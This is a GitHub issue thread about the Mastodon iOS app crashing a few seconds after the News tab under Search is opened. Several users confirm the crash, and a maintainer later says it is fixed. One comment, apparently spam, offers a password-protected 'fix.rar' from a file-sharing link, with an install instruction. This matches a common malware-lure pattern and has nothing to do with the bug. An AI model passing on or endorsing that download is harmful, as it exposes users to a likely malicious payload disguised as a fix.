### ISSUE TITLE
[BUG] Mastodon app crashes several seconds after opening News feed

### ISSUE THREAD

**Issue by blays-buckler** [mastodon/mastodon-ios#1341]
### Is there an existing issue for this?

- [X] I have searched the issues (both open and closed)

### Current Behavior

Any time I navigate to Search (magnifying glass in footer) -> News, the Mastodon app crashes within several seconds.

### Expected Behavior

I should be able to view the news tab without the app crashing.

### Steps To Reproduce

1. Within the environment described, launch the Mastodon app.
2. Tap the magnifying glass/search button in the footer.
3. Select the "News" tab.
4. Within 10-15 seconds the Mastodon app will crash, and appears to reopen in the background.

### Environment

```markdown
- Device: Apple iPhone 12 Pro
- OS: iOS 17.6.1
- Version: v2024.8
- Build: 6769
```

### Anything else?

I know you probably don't want color, but Mastodon is my primary source of news so this is rendering the app/service unusable for my purpose. If there's any other info I can provide please let me know. Thank you!

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rob180sx** [comment]
I’ve had this bug for two weeks now, I sent a couple messages on Mastedon asking about the issue. I can’t use the news tab without the app crashing within seconds on clicking. Reinstalling did nothing.

**Comment by kimar** [comment]
Thank you for the report. I'm actively investigating this issue and will report back asap.

**Comment by johnyush** [comment]
I have the same issue since middle of the August.
Device iPad 8th generation, OS: iPadOS 17.6.1 (21G93)

**Comment by renchap** [comment]
This has been fixed in the latest app version.
